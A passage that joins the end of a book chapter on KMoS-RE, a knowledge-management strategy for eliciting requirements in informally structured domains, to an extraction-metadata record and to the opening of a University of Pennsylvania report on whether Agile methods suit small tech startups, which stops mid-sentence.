structure and business processes, i.e. the application domain. According to Nguyen, to solve ill-structured problems, understanding the problem and the structure of the solution are interleaved. The problem solvers, i.e. the requirements engineers, must explore different areas of the problem to find a solution. To accomplish this task, they communicate with the diverse actors who have domain knowledge or another perspective of the possible solution. By performing this task, their domain knowledge increases and they can return to previous stages of the problem, but with additional knowledge that allows them to explore new possibilities of solution. Therefore, the knowledge of the problem and its solution gradually evolves as the requirements engineers gain more knowledge of the domain, mainly due to social interactions and involvement of business processes. We go further and assume that the grade of informality of the domain application influences the complexity of the process, as Figure 2 depicts. Our focus is on the requirements elicitation process for domains with a high degree of informality, where knowledge is informally stated, partially complete, implicitly assumed, tacit and unstructured. 2.3. Characteristics of ISD In order to effectively deal with ISD, we assume that they are located in the intersection of knowledge engineering and requirements engineering, and have the following characteristics [2]: - Presence of multiple domain specialists who have different backgrounds, perspectives, interests and expectations, and whose knowledge, either tacit or explicit, of the application domain varies depending on their experience and their role in the domain. Usually, domain specialists are not aware of the details of the product or solution and only have a vague idea of its general functionality. • Presence of a group of requirements engineers, responsible for eliciting the requirements, who generally are not involved in the application domain. They have general technical knowledge about the development of the product or solution; however, they must elicit the application domain knowledge in order to understand the details of it and derive the correct and appropriate solution requirements. • The solution solves or addresses a particular and unrepeatable situation. Thus, it must have its own design. However, there could be an infinite number of alternative solutions. In addition, the solution could be a tangible or intangible product and must be developed according to a requirements specification. • A requirements specification is a document that contains the set of solution requirements. A requirement is a natural language statement to be enforced by the solution, possibly in cooperation with other system components, and formulated in terms of the application domain. The development of the requirements specification requires eliciting, synthesizing, validating, sharing and creating great quantities of application domain knowledge and solution knowledge in order to reach an acceptable solution. In addition, in order to develop the requirements specification, a dialectical thinking is necessary among all involved in the project. Figure 3 depicts the characteristics described above; the figure represents explicit knowledge by puzzle pieces and tacit knowledge by clouds. The requirements specification is formed by pieces of knowledge of the domain specialists and requirements engineers. The requirements engineers must make the greatest possible amount of tacit knowledge explicit, synthesize the Figure 3. Informally structured domains. disperse knowledge and reconcile the diverse beliefs and necessities of the domain specialists. In addition, they need to incorporate their own technical knowledge in order to generate the set of requirements of the solution. In the figure, this process is represented by the solved puzzle. The cloud in the solved puzzle means that there will always be knowledge that is not susceptible to be formalized. 2.4. Challenges in ISD Some challenges of ISD are described as follows: 2.4.1. Tacit knowledge Tacit knowledge can cause critical knowledge, goals, expectations or assumptions to remain hidden. In consequence, the emergent requirements will appear incomplete and inappropriate, which can cause poor systems or costly effects [18]. 2.4.2. Situatedness Situated actions involve a dynamic interaction with the actor and its environment; they only acquire meaning through interpretation in a specific context [19]. Situated actions involve conscious reference to the context and choice of action. An action is not situated if it takes the form of a prescribed response or if it is an unconscious automatic response. In ISD, situated actions occur frequently; in consequence, requirements are mostly situated and depend on a process of negotiation. In this situation, domain knowledge is fundamental in order to understand the rationality behind requirements, facilitate the negotiation process and propose technological aspects of the solution according to the real necessities of the domain specialists. 2.4.3. Disperse knowledge Products or solutions in ISD are so complex that the human knowledge required to develop them generally is vastly larger than the maximum individual human capacities [20]. Therefore, organized teams formed of specialists must develop them. In order to cooperate in the solution, domain specialists must share some knowledge about the domain. However, they always have different backgrounds, perspectives, interests and expectations, and their knowledge and experience vary depending on their own practice and role in the domain. Sometimes even inconsistent and incompatible beliefs can exist. Product developers or solution-solvers should reconcile and prioritize the diverse beliefs and knowledge about the application domain in order to incorporate it to the solution. 2.4.4. Asymmetry of knowledge Domain knowledge is the knowledge of the area to which a set of theoretical concepts is applied. In ISD, the concept of domain knowledge has two meanings. Firstly, solution domain knowledge corresponds to methods, techniques and tools that form the basis for the development of the product or solution. Secondly, those products or solutions are developed to necessities of real-word problems that exist in an application domain. Thus, both solution domain knowledge and application domain knowledge are necessary to develop the product or solution [20]. Asymmetry of knowledge, or symmetry of the ignorance, refers to the knowledge gap that exists between domain specialists, owners of the application domain knowledge, and requirements engineers, owners of the solution domain knowledge [5]. In ISDs, this phenomenon is increased because of the large amount of tacit knowledge involved. When the gap is big, there is not cognitive empathy and the communication process is not effective. Therefore, requirements engineers could produce models that do not represent the reality. 3. Knowledge management Knowledge management (KM) is a discipline with the aim of enhancing an organization by sharing and managing the knowledge flow among the people [5]. KM is much more than just the use of information technology to manage knowledge. Due to the complexity of deal with knowledge, this discipline has developed theoretical concepts in order to explain and face the underlying problem of elicitation, creation, exchange and validation of knowledge. According to Pilat and Kaindl [5], there are three fundamental concepts in KM closely related to requirements elicitation such as the knowledge transfer and transformation process, the distinction between explicit and tacit knowledge and the issues of knowledge exchange. In addition, we consider that a creation knowledge process, where the knowledge of all involved in the project evolves, is also present in ISD. 3.1. Knowledge transfer and transformation process The knowledge transfer process is carried out when the knowledge of a person is transformed into natural language, and in non-verbal channels of human communication in order to be transferred to another person, who then decodes this knowledge according to their own interpretation. Any transfer of knowledge is inherently bound to acknowledge transformation, so there will always be some degree of ambiguity. Ambiguity affects the elicitation of correct requirements because people involved in the project could build different and possibly incompatible interpretations of the concepts, relations and processes of the domain. Linguists point to several sources of ambiguity such as lexical, syntactic, semantic and pragmatic. ISD produce an additional kind of ambiguity named nocuous when two people mutually ignore that they have their own different interpretation. In this situation, they end up talking about different concepts while they think that they are talking about the same topic. According to Gacitua et al. [18], any person involved in the process can be aware of this phenomenon, because they do not have access to the tacit knowledge of each other. 3.2. Conversion of tacit knowledge to explicit Nonaka and Takeuchi [7] propose a model of conversion of knowledge in organizations based on Polanyi’s theory of tacit knowledge. For them, knowledge creation in an organization is the result of social interaction where tacit and explicit knowledge is transferred. The model postulates four iterative conversion modes such as socialization, externalization, combination and internalization (SECI) which are described as follows: - **Socialization** is the process of transferring tacit knowledge among individuals by sharing mental models and technical skills. - **Externalization** is the process of converting tacit knowledge to explicit through the development of models, protocols and guidelines. - **Combination** is the process of recombining or reconfiguring existing bodies of explicit knowledge to create new explicit knowledge. - **Internalization** is the process of learning by repetition of tasks that apply explicit knowledge. Individuals will absorb the knowledge as tacit knowledge again. According to Nonaka, if this cycle is done consciously, looping through this knowledge spiral may evolve the overall knowledge held collectively. The spiral of knowledge can be applied to requirements elicitation in order to face the inherent knowledge management challenges of the process. Despite that, we found just a few researches that explore this possibility. Wan et al. [21] proposed a model of knowledge conversion to the requirements elicitation process with the aim to minimize the symmetry of ignorance between developers and domain specialists. The authors base their model on the SECI model and consider the knowledge flowing between domain specialists and developers. They introduced a new agent in the process: the requirements specialist. This person would act as an intermediary between the domain specialists and the developers, so he or she must earn the trust of those involved in the process. The authors use their model to analyse a requirements elicitation process of a real software development project. In conclusion, the authors argue that the proposed model can reduce the symmetry of ignorance and facilitate the elicitation of tacit requirements. Nevertheless, to be successful in the process they suggest that the requirement specialists must have enough domain knowledge. We consider that it is difficult, if not impossible, that a person knows about every domain, so the incorporation of this new agent could hinder the, complex by itself, elicitation process. On other hand, Vásquez-Bravo et al. [22] proposed a classification of elicitation techniques to facilitate their selection in an RE process based on the phases of Nonaka’s model. However, they do not propose how to use these techniques and how to elicit tacit knowledge. ### 3.3. Knowledge sharing In order to implement the knowledge spiral property, it is crucial to facilitate the exchange of knowledge among all involved in the project [16]. It implies focusing on the knowledge holders, especially in ISD where knowledge is mostly tacit. This task may become difficult to handle because requirements engineers can be confronted with several persons whom they do not know. KM offers the concept of knowledge map [5], an artefact that points to knowledge but does not contain it. The artefact could be a table or a matrix indicating which person has what knowledge. The knowledge map should be created and initialized at the beginning of the process and continually be updated as the spiral of knowledge evolves. A knowledge map is also useful to discover for which knowledge a knowledge holder might be missing. In ISD, we assume that a knowledge map would also be useful for indicating the tacitness level of the knowledge holders. Thus, we propose the piece of knowledge (PoK) matrix, an artefact to fulfil the functions mentioned above and to be used in the KMoS-RE© strategy. The PoK matrix is a data structure that stores the relation of every individual (solution solver or domain specialist) involved in the project with every piece of knowledge about the domain. A piece of knowledge can be a concept, a relationship or behaviour. The PoK matrix is used as a reference to figure out which concepts, relationships or behaviours had been made explicit and which of them remain tacit. The aim of the KMoS-RE© strategy is to look for the transformation, from 0 to 1, of the most possible values in the PoK matrix. This is in order to make explicit the most possible quantity of tacit knowledge. It would be ideal if the requirements engineers could make explicit all pieces of knowledge. However, there will always be knowledge that it cannot be converted to explicit; therefore, the requirements engineers must propose the most suitable solution with the explicit knowledge obtained at a particular moment. 3.4. Knowledge evolution spiral As was mentioned above, in ISD, understanding the problem and the structure of the solution are intertwined. The problem solvers, that is, the requirements engineers, must explore different areas of the problem to find a solution. In order to accomplish this task, they should dialogue with the domain specialists, who have their own domain knowledge and perspective of the possible solution. By performing this task, the knowledge of the problem solvers about the application domain evolves. If were necessary, they can return to previous states of the project, but their knowledge is not the same, they will have additional knowledge that allows them to explore new possibilities of solution. In summary, the knowledge of the problem and its solution gradually evolves as requirements engineers gain more knowledge of the application domain due to social interaction and their involvement with the business processes. In order to model that behaviour, the knowledge evolution model for requirements elicitation (KEM-RE) was developed based on the SECI model. The KEM-RE is an iterative cycle (Figure 4) that consists of four stages that include the four kinds of knowledge processes in the innovation of complex problem solving: - **Knowledge elicitation (KE) stage.** The requirements engineers elicit knowledge from domain specialists and vice versa. The socialization mode predominates. - **Knowledge integration and application (KI & A) stage.** The requirements engineers integrate the acquired knowledge and their own experience into models. This is a complex activity in which combination and externalization modes are presented. In addition, as the requirement engineers develop models they internalize the domain knowledge. - **Knowledge sharing and exchange (KS & E) stage.** The models developed by requirements engineers will be shared with the domain specialists. This phase takes place through socialization. - **Knowledge validation (KV) stage.** The domain specialists validate the models. In order to develop this activity, they must internalize the knowledge behind the models through a cognitive dialogue. This process leads to the elicitation of new knowledge. Then the cycle starts again. 4. KMoS-RE©: an approach from knowledge management discipline The KMoS-RE© strategy [6] is a high-level plan to achieve a set of requirements of a solution or product through the eliciting, structuring and creating of knowledge. Following the work of [24], the strategy consists of three phases: domain modelling (DM), system modelling (SM) and specification developing (SD) and structures its flow of activities according the KEM-RE. Furthermore, it includes transversal activities to identify and make explicit the most possible quantity of tacit knowledge. Those activities are conducted by the identification of presuppositions [18] and classification of verbs according the Blooms’ taxonomy [23]. The strategy also includes artefacts to facilitate the sharing knowledge: a record of wrong beliefs and the PoK matrix (Section 4.3). A brief explanation of each phase is provided as follows: - **Domain modelling phase (DM).** In this phase, the terms, i.e. the concepts, attributes and relationships, and the basic integrity restrictions are formalized through a consensus, in order to understand the application domain without worry about the solution. The terms are recorded in the Knowledge of Domain on an Extended Lexicon (KDEL); a lexical that classifies them into objects, subjects and verbs. The KDEL is used to facilitate the building of a graphical conceptual model. The externalization of this knowledge will enable achievement a consensus among the stakeholders; hence to minimize the symmetry of ignorance. The concepts and relationships identified in this phase will generate the first version of the piece of knowledge (PoK) matrix. In addition, a graphical conceptual model is required in order to facilitate the cognitive dialogue with the domain specialists. Requirements engineers will decide what kind of conceptual model use, from entity-relationship model to ontologies, depending on the characteristics of the domain. - **System modelling phase (SM).** In this phase, the current and future system processes are formalized. The current system corresponds to the system, as it exists at present. The future system represents the system after the deployment of a solution or product. The Use Cases technique was selected to model the system, both current and future, because its usefulness... has been demonstrated through the time. The system model is obtained from the KDEL and the conceptual model. The behaviours identified in this phase will also change the values of the PoK matrix. - **Specification development phase (SD).** In this phase, the requirements are derived from the Uses Cases’ scenarios of the future system and incorporated into the solution requirements specification (SIRS). Figure 5 depicts a general view of the KMoS-RE© strategy in a unified modelling language (UML) activity diagram. Every activity of the strategy corresponds to one stage of the KEM-RE: model validations (MV) is related to knowledge validation (KV), knowledge elicitation (KE) is related with the stage of the same name, model discussion (MD) corresponds to knowledge sharing and exchange (KS & E) and domain modelling (DM), system modelling (SM) and specification development (SD) correspond to knowledge integration and application (KI & A). The swim lanes in the figure represent the activities developed by each type of actor. ![Figure 5. Knowledge management on a strategy for RE.](http://dx.doi.org/10.5772/intechopen.70071) 4.1. KMoS-RE© analysis According to Maalej and Thurimella [24], managing requirements knowledge is about efficiently identifying, accessing, externalizing and sharing domain and technical knowledge by and to all involved in the project, including analysts, developers, and domain specialists, which is closely related to a full perspective of KM. The rationality of the KMoS-RE© strategy is based on the fundamental issues described as follows: - The flow of activities in the KMoS-RE© strategy is based on the knowledge evolution model KEM-RE, which is based on the knowledge evolution spiral proposed by Nonaka. The evolution spiral knowledge has the aim of facilitating the conversion of tacit knowledge to explicit. In addition, the incorporation of techniques such as the identification of presuppositions and the classification of verbs according the Bloom’s taxonomy make easier-identifying knowledge that could be tacit, and hence hidden. - Representing requirements knowledge targets an efficient information access and artefact reuse within and between projects. The KMoS-RE© strategy proposes several artefacts in order to represent different views of the system. They can be accessed and shared by all involved in the project. Although several requirements elicitation proposals use lexical, conceptual models, use cases models and scenarios, few of them combine those techniques in a strategy. Besides, the KMoS-RE© strategy proposes two innovative artefacts: the record of belief and the PoK matrix. - Sharing requirements knowledge improves the collaboration among all involved in the project and ensures that their experiences do not get lost. The knowledge spiral in which the activities of the KMoS-RE© strategy are based compels to sharing the knowledge among solution-solvers and domain specialists through socialization. - Reasoning about requirements and their interdependencies aims at detecting inconsistencies and deriving new knowledge. Externalizing the knowledge through the development of the different artefacts let the solution-solver reason and internalized the domain knowledge. 4.2. KMoS-RE© applied to real ISD cases The KMoS-RE© strategy has been applied in the development of solution of several real ISD cases: - **Software development for complex domains.** This is a complex and creative activity in which software developers should understand, as soon as possible, the knowledge of a domain in which generally are neophytes. Then, combine this knowledge with their own technical knowledge in order to reach a solution that meets clients’ expectations. The KMoS-RE© strategy has been used to develop a cognitive rehabilitation system for sclerosis multiple patients [6]. - **Soft computing.** This artificial intelligence (AI) subarea includes several techniques that are suitable for solutions in ISD, since it is tolerant of imprecision, uncertainty, partial truth and approximation. A complex problem in soft computing is how to elicit the knowledge of specialists in order to incorporate it in an appropriate representation and to reach correct solutions. A case-based reasoning system to support heating ventilation and air conditioning (HVAC) design decisions was developed using the KMoS-RE© strategy [8]. • **Intelligent tutoring systems.** Over the past decade, intelligent tutoring systems have become increasingly accepted as viable learning tools in academia and industry. However, most of these solutions had been developed for well-defined domains. Informally structured domains, such as computer programming, laws and ethics, present a number of unique challenges for researchers in intelligent tutoring, especially to represent and evaluate the knowledge. We are currently exploring the adaptation of the KMoS-RE© strategy with the aim of getting a method to develop Bayesian Networks for evaluation in intelligent tutoring systems in the context of ISD. • **Industrial design.** The KMoS-RE© strategy had been used as a HVAC requirements process in a real company [8]. The HVAC design is a difficult task because the information necessary for solving the problem is incomplete and vague. This knowledge belongs to the domain specialists, generally a set of specialists from different fields, such as mechanical engineers, control engineers, electrical engineers and architects. In addition, there could be multiple and controversial solutions and the criteria that determine the best design solution is complex and imprecise. 4.3. Discussion Nowadays, the negative effects of inappropriate, incorrect and ambiguous requirements have been widely studied and are well known. Despite the vast quantity of proposals, methods, techniques and tools, requirements elicitation is still an open problem, as shown by many projects that do not fulfil clients’ expectations or that exceed the development time due to bad elicited requirements. Thus, there are still clear opportunities to improve. The application of the KMoS-RE© strategy in real ISD cases has showed that its characteristics are clear contributions to the requirements elicitation area, as it is described as follows: • **Emphasis on application domain knowledge.** The importance of the application domain knowledge in order to improve the requirements elicitation process is widely accepted. However, currently the most of the methods and tools of requirements elicitation are designed for general problem domains, where problem-specific domain knowledge is not completely necessary [25]. The KMoS-RE© strategy emphasizes the importance of the application domain knowledge, either tacit or explicit, besides of proposing techniques and methods to facilitate its discovery, representation, sharing and appropriation among all involved in the project. Thus, the strategy can be applied in knowledge-intensive projects. • **Generality and adaptability.** The theoretical concepts of knowledge management, in which the KMoS-RE© strategy is supported, allow it to be applied to domains with different levels of informality. It also has the advantage of being considered as a high-level plan; therefore, the requirements engineers have the authority to decide which phases are necessary. In some cases, they can even choose between different techniques and methods. • **Evolutive.** The strategy is not limited to the proposed so far. The model allows the incorporation of new proposals from methods and techniques to knowledge management models or perspectives of elicitation of requirements. For example, we are currently analysing the adaptation that is based on goals elicitation approach [26], the knowledge audit model [25] and the social network analysis [27]. - **Algorithmic.** Despite its generality and adaptability, the KMoS-RE© strategy is algorithmic in the sense that the process of its implementation is well defined and limited, so the requirements engineers do not need a deep knowledge about the theoretical concepts of knowledge management. Most of the cases showed in the previous section were led by undergraduate engineering students [8]. Although a process of awareness of the issues of informal structured domains is always recommended. Finally, we would like to emphasize that the most important contribution of the KMoS-RE© strategy is that it does not try to work against human nature; it recognizes its capabilities and limitations and builds the best proposal based on that. Thus, according to the below and the valuable results of the application of the KMoS-RE© strategy in several and different contexts, it can already be considered as a serious approach for requirements elicitation knowledge. 5. Conclusions and future works The KMoS-RE© strategy is a novel approach from KM in order to face the challenges of eliciting knowledge and creatively transform it into a set of requirements of a product or solution in order to satisfy the needs and fulfil whole expectations of clients and users. The strategy is focused on dealing with ISD. Due to the characteristics of these domains, the strategy has a full KM perspective, i.e. it incorporates knowledge engineering techniques in order to properly manage tacit knowledge. The domain modelling phase handles the problem of formalizing the concepts and relationships; at least a consensus about it is reached. The system modelling phase deals with the problem of structuring the processes in the domain. Thus, the problem of handling tacit knowledge has addressed properly by KMoS-RE© strategy. The strategy was applied to several ISD real cases in different and diverse areas. The solutions achieved provide evidence about the usefulness, the value and the generalization of it. Therefore, the application of the KMoS-RE© strategy in several real cases shows that it is a useful approach in order to elicit the requirement of solutions or products especially in ISD. Finally, the challenge of managing the tacit knowledge requires to analyze more cases in order to improve all the KM approaches including the KMoS-RE© strategy. Author details Karla Olmos-Sánchez* and Jorge Rodas-Osollo *Address all correspondence to: kolmos@uacj.mx Autonomous University of Ciudad Juárez, Ciudad Juárez, Chihuahua, México References
{"Source-Url": "https://api.intechopen.com/chapter/pdf-preview/56375", "len_cl100k_base": 8448, "olmocr-version": "0.1.53", "pdf-total-pages": 19, "total-fallback-pages": 0, "total-input-tokens": 37543, "total-output-tokens": 10809, "length": "2e13", "weborganizer": {"__label__adult": 0.0004394054412841797, "__label__art_design": 0.0016117095947265625, "__label__crime_law": 0.0006227493286132812, "__label__education_jobs": 0.037689208984375, "__label__entertainment": 0.00026297569274902344, "__label__fashion_beauty": 0.0003802776336669922, "__label__finance_business": 0.005615234375, "__label__food_dining": 0.0006113052368164062, "__label__games": 0.0014047622680664062, "__label__hardware": 0.0010480880737304688, "__label__health": 0.001308441162109375, "__label__history": 0.0008678436279296875, "__label__home_hobbies": 0.0002849102020263672, "__label__industrial": 0.00115966796875, "__label__literature": 0.001804351806640625, "__label__politics": 0.0004546642303466797, "__label__religion": 0.0007033348083496094, "__label__science_tech": 0.412109375, "__label__social_life": 0.0003635883331298828, "__label__software": 0.040191650390625, "__label__software_dev": 0.489501953125, "__label__sports_fitness": 0.00037217140197753906, "__label__transportation": 0.0007686614990234375, "__label__travel": 0.00030803680419921875}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 49656, 0.05072]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 49656, 0.70341]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 49656, 0.92866]], "google_gemma-3-12b-it_contains_pii": [[0, 628, false], [628, 2494, null], [2494, 6086, null], [6086, 9410, null], [9410, 11590, null], [11590, 15136, null], [15136, 17460, null], [17460, 19233, null], [19233, 21950, null], [21950, 24987, null], [24987, 28427, null], [28427, 31875, null], [31875, 34195, null], [34195, 35333, null], [35333, 38595, null], [38595, 41896, null], [41896, 44559, null], [44559, 46841, null], [46841, 49656, null]], "google_gemma-3-12b-it_is_public_document": [[0, 628, true], [628, 2494, null], [2494, 6086, null], [6086, 9410, null], [9410, 11590, null], [11590, 15136, null], [15136, 17460, null], [17460, 19233, null], [19233, 21950, null], [21950, 24987, null], [24987, 28427, null], [28427, 31875, null], [31875, 34195, null], [34195, 35333, null], [35333, 38595, null], [38595, 41896, null], [41896, 44559, null], [44559, 46841, null], [46841, 49656, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 49656, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 49656, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 49656, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 49656, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 49656, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 49656, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 49656, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 49656, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 49656, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 49656, null]], "pdf_page_numbers": [[0, 628, 1], [628, 2494, 2], [2494, 6086, 3], [6086, 9410, 4], [9410, 11590, 5], [11590, 15136, 6], [15136, 17460, 7], [17460, 19233, 8], [19233, 21950, 9], [21950, 24987, 10], [24987, 28427, 11], [28427, 31875, 12], [31875, 34195, 13], [34195, 35333, 14], [35333, 38595, 15], [38595, 41896, 16], [41896, 44559, 17], [44559, 46841, 18], [46841, 49656, 19]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 49656, 0.0]]}
olmocr_science_pdfs
2024-12-08
2024-12-08
7bd2c82364fe03a2bc2309d312cc5552fa573454
1-1-2013 Is a Rigorous Agile Methodology the Best Development Strategy for Small Scale Tech Startups? Alex Yau *University of Pennsylvania*, ayau@sas.upenn.edu Christian Murphy *University of Pennsylvania*, cdmurphy@seas.upenn.edu Follow this and additional works at: [http://repository.upenn.edu/cis_reports](http://repository.upenn.edu/cis_reports) Part of the [Computer Engineering Commons](http://repository.upenn.edu/cis_reports) **Recommended Citation** [http://repository.upenn.edu/cis_reports/980](http://repository.upenn.edu/cis_reports/980) This paper is posted at ScholarlyCommons. [http://repository.upenn.edu/cis_reports/980](http://repository.upenn.edu/cis_reports/980) For more information, please contact repository@pobox.upenn.edu. Is a Rigorous Agile Methodology the Best Development Strategy for Small Scale Tech Startups? Abstract Recently, Agile development processes have become popular in the software development community, and have been shown to be effective in large organizations. However, given that the communication and cooperation dynamics in startup companies are very different from that of larger, more established companies, and the fact that the initial focus of a startup might be significantly different from its ultimate goal, it is questionable whether a rigid process model that works for larger companies is appropriate in tackling the problems faced by a startup. When we scale down even further and observe the small scale startup with only a few members, many of the same problems that Agile methodology sets out to solve do not even exist. Then, for a small scale startup, is it still worth putting the resources into establishing a process model? Do the benefits of adopting an Agile methodology outweigh the opportunity cost of spending the resources elsewhere? This paper examines the advantages and disadvantages of adopting an Agile methodology in a small scale tech startup and compares it to other process models, such as the Waterfall model and Lean Startup. In determining whether a rigorous agile methodology is the best development strategy for small scale tech startups, we consider the metrics of cost, time, quality, and scope in light of the particular needs of small startup organizations, and present a case study of a company that has needed to answer this very question. Keywords Agile methodology, Lean Startup, small scale tech startup. Disciplines Computer Engineering Comments This technical report is available at ScholarlyCommons: http://repository.upenn.edu/cis_reports/980 Is a Rigorous Agile Methodology the Best Development Strategy for Small Scale Tech Startups? Alex Yau and Christian Murphy Department of Computer and Information Science University of Pennsylvania Philadelphia PA 19104 ayau@sas.upenn.edu, cdmurphy@seas.upenn.edu Abstract—Recently, Agile development processes have become popular in the software development community, and have been shown to be effective in large organizations. However, given that the communication and cooperation dynamics in startup companies are very different from that of larger, more established companies, and the fact that the initial focus of a startup might be significantly different from its ultimate goal, it is questionable whether a rigid process model that works for larger companies is appropriate in tackling the problems faced by a startup. When we scale down even further and observe the small scale startup with only a few members, many of the same problems that Agile methodology sets out to solve do not even exist. Then, for a small scale startup, is it still worth putting the resources into establishing a process model? Do the benefits of adopting an Agile methodology outweigh the opportunity cost of spending the resources elsewhere? This paper examines the advantages and disadvantages of adopting an Agile methodology in a small scale tech startup and compares it to other process models, such as the Waterfall model and Lean Startup. In determining whether a rigorous agile methodology is the best development strategy for small scale tech startups, we consider the metrics of cost, time, quality, and scope in light of the particular needs of small startup organizations, and present a case study of a company that has needed to answer this very question. Index Terms—Agile methodology, Lean Startup, small scale tech startup. I. INTRODUCTION In recent years, there has been an increased focus on the managerial and organizational aspects of software engineering in tech startups. Software process models are being created and changed constantly with the belief that better process models can ultimately lead to the success of a company. Recently, Agile methodology has become popular in the software development community. Some consider this the best thing that has to the software industry, and perhaps a possible “Silver Bullet” to solve the problems of software development. Over the years, the Agile methodology has proven successful in many large companies [12]. However, we must understand that the communication and cooperation dynamics in startups are very different from that of larger, more established companies and therefore startups may have different problems and concerns that do not apply to giant corporations. Although companies ultimately have the same business goals, “Faster, Cheaper and Better”, the initial focus of a startup might be significantly different from its ultimate goal. Depending on the current business environment, the immediate business goal for a startup may change constantly to react to these changes. Therefore, a rigid process model that works for larger companies may be inefficient in tackling the problems faced by a startup. Furthermore, startups are faced with limitations that their larger counterparts may take for granted. With limited resources and, in many cases, constant direct competition, allocating human resources to defining and maintaining a rigorous methodology is out of the question for some. However, the Agile methodology has been shown as successful in many case studies and research [8]. But is it a “one-size-fits-all”? In tech startups, Agile definitely has clear benefits over some of the other, traditional methods. It has a solid principle and has been shown from past case studies to mitigate certain problems faced by companies. However when we scale down even further and observe the “small scale” startup with, say, only three members, a lot of the same problems that Agile methodology sets out to solve do not even exist. For example, with three members working in a small office, the problem of communication becomes insignificant compared to the problem of communication among a 100 person startup. Then, for a small scale startup, is it still worth putting the resources into establishing a process model? Do the benefits of adopting an Agile methodology outweigh the opportunity cost of spending the resources elsewhere? This paper examines the advantages and disadvantages of adopting an Agile methodology in a small scale tech startup and compares it to other process models, such as the Waterfall model and Lean Startup, and attempts to answer the question, “Is a rigorous Agile methodology the best development strategy for small scale tech startups?” II. SCOPE Before we begin, it is essential to define the scope of the proposed question. Since Agile software development can be considered as merely “a collection of practices, a frame of mind” [6], it is difficult to tell whether a company’s process model is defined as Agile. Some may choose to follow those Agile beliefs loosely while others may employ a strict Agile system. Therefore it is important to distinguish companies with different levels of “agility” in order to properly analyze the effectiveness of the agile system. In the scope of this paper, a rigorous Agile methodology will be defined as one that follows *all* the Agile principles and strict practices, similar to Extreme Programming and Scrum. Secondly, as briefly mentioned earlier, Agile development may have different effects on a company depending on its stage and size. The cost of implementing the Agile methodology and the benefits vary as the company grows. This paper focuses on the effects of Agile on a “small scale” startup, one composed of roughly eight members or less. This is a good scope to focus on since a majority of startups begin with roughly two to three founding members and perhaps a few more engineers [26]. Thus, the discussion will mostly concentrated on the cost of implementing the Agile system in a startup of such a scale and the benefits and impact it has in the perspective of the early small scale startup. Lastly, in order to answer the proposed question and determine if a rigorous Agile methodology is “the best development strategy”, we must first discuss the scope of the metrics that we are using to determine the effectiveness of a process model. The metrics used in this discussion are cost, time, quality and scope as they apply to a startup. This paper will thus compare the effectiveness of different process models based on their effects on the four areas mentioned. These metrics will be defined fully in Section IV below. III. METHODOLOGY This section outlines the necessary steps required to answer the proposed question, “Is a rigorous Agile methodology the best development strategy for small scale tech startups?” We first begin by observing the problems of software development and defining the four metrics – cost, time, quality and scope – and the tradeoffs associated in the perspective of a small scale startup (Section IV). We will then discuss some of the traditional process models, such as the Waterfall model, and their effects on the four metrics (Section V). The paper will then follow with a detailed definition of the Agile methodology, its principles and the practices associated, such as Extreme programming and Scrum. The impact of Agile methodology on the four metrics will be compared with the traditional process models and their implications on small scale tech startups will be addressed (Section VI). A popular alternative to the Agile methodology, the Lean Startup will then be discussed and compared to Agile (Section VII). A thorough case study on a small scale tech startup, Everyme, will be presented and used as an example of a Lean Startup that does not employ a strict Agile methodology (Section VIII). The paper ends with a proposed solution to the question raised. IV. METRICS Since process models are tools of project management, in order to analyze the quality of a process model, we must first consider the goals of project management itself. According to Olsen’s article “Can Project Management Be Defined?”, project management is “the application of a collection of tools and techniques...toward the accomplishment of a...task within time, cost and quality constraints” [17]. Similarly, the British Standard for project management [2][9] defines project management as “the planning, monitoring and control of all aspects of a project...to achieve the project objectives on time and to the specified cost, quality and performance.” In the scope of this paper, we focus on the process model as the tool that is used to accomplish a task according to the metrics of time, cost and quality constraints. Time, cost, scope and quality make up what is commonly known as the iron triangle [2][9] or triple constraints of project management. The iron triangle is a visual representation of the common tradeoffs of project management. It suggests that in order to increase the scope of a project, time and cost must suffer in order to keep the same quality, vice versa. Therefore, by analyzing the impact of a process model on the time, cost, scope and quality of software being developed, we can assess the effectiveness of the model or methodology. In the scope of software development in small scale tech startups, the four metrics can be defined as: - **Time** - The total time taken from start of the project to a public release of the product or service - **Cost** - The total cost spent by the startup, including cost of hiring engineers - **Scope** - The number of features and extensions (such as language localization) of the product - **Quality** - This includes both internal quality, such as testability and maintainability, and external quality, such as usability and reliability V. TRADITIONAL PROCESS MODELS One of the more popular traditional process models is the Waterfall model. The Waterfall model has been around since the 1970s and is “a framework for software development in which development proceeds sequentially through a series of phases” [14]. The progress flows from one phase to another in order, although short feedback loops are allowed. It is possible to move backwards and make modifications based on the feedback, but other than that the system generally follows these distinct steps: 1. **Requirements analysis** - The first step is to gather information, define the scope and understand and analyze the specifications of the project. 2. **Design** - The second step is to define the hardware and/or software architecture, modules, interfaces, etc. to satisfy the requirements specified in the first step. 3. **Implementation** - This step consists of actually coding and constructing the software based on the design and requirements established from the previous two steps. 4. Testing - In this step, all the components are integrated together and tested to ensure they meet the customer’s specifications as specified in the first step. 5. Installation - This step prepares the product for delivery for commercial use. 6. Maintenance - The last step involves making modifications to improve the quality and performance on the system based on the feedback from the customer. From the outline of the Waterfall model, we can see some immediate benefits to software development in startups. The model provides a clearly defined structure that enforces discipline for a startup. It provides a clear direction with a transparent way of assessing progress through the use of milestones. Since a direction is not immediately obvious to young startups, and the software development process may be quite unstructured and unorganized, the Waterfall model can not only provide a clear vision 